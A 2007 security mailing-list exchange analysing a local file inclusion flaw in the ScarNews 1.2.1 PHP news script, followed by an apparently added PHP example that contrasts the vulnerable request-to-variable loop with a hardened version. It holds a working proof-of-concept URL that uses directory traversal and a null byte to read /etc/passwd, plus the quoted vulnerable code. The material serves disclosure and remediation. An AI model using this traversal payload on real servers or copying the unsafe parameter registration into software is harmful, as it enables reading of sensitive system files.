[VIM] ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit

str0ke str0ke at milw0rm.com
Mon Apr 9 16:00:39 UTC 2007


Hey George,

Wish I would have had a backup for you.  The die() wasn't there before
and was modified.

  if(!defined("SN_INCLUDE")) {
          die("ACCESS FORBIDDEN");
  }

It's still vulnerable with or without register globals but we need
magic quotes = off.

scarnews.php
#######################

if(!$sn_db_handel && file_exists($sn_admin_dir."scarnews.inc.php")) {
     include($sn_admin_dir."scarnews.inc.php");


scarnews.inc.php
##################################
	
$sn_get_post = $_REQUEST;
foreach ($sn_get_post as $sn_key => $sn_value) {
    if(ereg("^sn_",$sn_key)) { ${$sn_key} = $sn_value; }
}

$PHP_SELF = $_SERVER['PHP_SELF'];

######################################################################
###                                                                ###
###  Include the configuration files                               ###
if(file_exists($sn_admin_dir."admin/config.inc.php")) {            ###
     include($sn_admin_dir."admin/config.inc.php");                ###
} else {


http://site.com/scarnews.inc.php?sn_admindir=../../../etc/passwd%00

/str0ke

On 4/9/07, George A. Theall <theall at tenablesecurity.com> wrote:
> Milw0rm 3687 is for a local file include in a German news script. If I
> read the PoC correctly, the flaw lies with the 'sn_admin_dir' parameter
> of the 'scarnews.inc.php' script. The vendor seems to have just patched
> several files; eg,
>
>    http://www.scar4u.de/news/index.php?sn_show_news=117
>
> yet the version remains pegged at 1.2.1. Anyone have a copy of the
> affected file before the changes? The version I just grabbed has this at
> the top:
>
>    if(!defined("SN_INCLUDE")) {
>            die("ACCESS FORBIDDEN");
>    }
>
> preventing it from being called directly and which I suspect is what's
> just been changed. Later in the file, we have global variable
> registration as long as the parameter starts with "sn_":
>
>    $sn_get_post = $_REQUEST;
>    foreach ($sn_get_post as $sn_key => $sn_value) {
>        if(ereg("^sn_",$sn_key)) { ${$sn_key} = $sn_value; }
>    }
>
> and then:
>
>    if(file_exists($sn_admin_dir."admin/config.inc.php")) {            ###
>         include($sn_admin_dir."admin/config.inc.php");                ###
>    } else {
>
> So, the issue is probably valid.
>
>
> George
> --
> theall at tenablesecurity.com
>
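The root cause discussed in this thread is the loop that turns every "sn_"-prefixed request parameter into a global, so $sn_admin_dir can be overwritten before include() uses it. The script below is an added example, not ScarNews code: it reproduces that registration pattern as a function, then shows a hardened replacement that only accepts an explicit list of parameters, keeps the admin directory out of the request entirely, and checks the resolved include path. The function names, the SN_ALLOWED_PARAMS list and the $request array are all constructed for this example.

```php
<?php
// Added example (not ScarNews code). Run from the CLI: php lfi_example.php
// $request below is a constructed sample standing in for $_REQUEST.

// --- The vulnerable pattern, as quoted in the thread ------------------------
// Every parameter whose name begins with "sn_" becomes a variable, so a client
// can set $sn_admin_dir before scarnews.inc.php passes it to include().
// (The added SN_INCLUDE guard only blocks requests sent straight to the include
// file; it does not remove this registration.)
function sn_register_request_vars_unsafe(array $request): array
{
    $vars = [];
    foreach ($request as $sn_key => $sn_value) {
        // ereg() was removed in PHP 7; preg_match() is the equivalent test.
        if (preg_match('/^sn_/', $sn_key)) {
            $vars[$sn_key] = $sn_value;   // stands in for ${$sn_key} = $sn_value
        }
    }
    return $vars;
}

// --- Hardened replacement ---------------------------------------------------
// 1. Only explicitly listed parameters are accepted, and none of them is a
//    variable that feeds a filesystem path (list is hypothetical).
// 2. The admin directory is fixed by configuration, never read from the request.
// 3. The final include path is resolved with realpath() and must be a regular
//    file below the application root.
const SN_ALLOWED_PARAMS = ['sn_show_news', 'sn_page'];

function sn_register_request_vars_safe(array $request): array
{
    $vars = [];
    foreach (SN_ALLOWED_PARAMS as $key) {
        if (isset($request[$key]) && is_string($request[$key])) {
            $vars[$key] = $request[$key];
        }
    }
    return $vars;
}

function sn_resolve_include(string $app_root, string $admin_dir, string $file): ?string
{
    // Reject NUL bytes first: PHP before 5.3.4 truncated the path at "\0",
    // which is what the %00 in the PoC relies on; current PHP throws on it.
    if (strpos($admin_dir, "\0") !== false || strpos($file, "\0") !== false) {
        return null;
    }
    $root = realpath($app_root);
    if ($root === false) {
        return null;
    }
    // realpath() collapses any "../" segments and returns false for missing files.
    $candidate = realpath($root . '/' . $admin_dir . '/' . $file);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Require the resolved file to sit strictly inside $app_root.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// --- Demonstration with constructed input -----------------------------------
$request = [
    'sn_show_news' => '117',
    'sn_admin_dir' => "../../../etc/passwd\0",   // client-supplied, as in the PoC
];

$unsafe = sn_register_request_vars_unsafe($request);
echo "unsafe registration exposes sn_admin_dir: ",
     var_export(isset($unsafe['sn_admin_dir']), true), "\n";   // true

$safe = sn_register_request_vars_safe($request);
echo "hardened registration exposes sn_admin_dir: ",
     var_export(isset($safe['sn_admin_dir']), true), "\n";     // false

// Even if the request value reached the path check, it is rejected before
// include() is ever called.
var_dump(sn_resolve_include(__DIR__, $request['sn_admin_dir'], 'config.inc.php'));   // NULL

// The configured location resolves only if ./admin/config.inc.php exists
// next to this script; otherwise it is also NULL rather than an include attempt.
var_dump(sn_resolve_include(__DIR__, 'admin', 'config.inc.php'));
```

The point of the two registration functions side by side is that the fix is not the die() guard George mentions but removing the request-to-variable loop: with an explicit parameter list, $sn_admin_dir can only come from config.inc.php. The realpath() check is a second layer in case a path-building variable is ever exposed again.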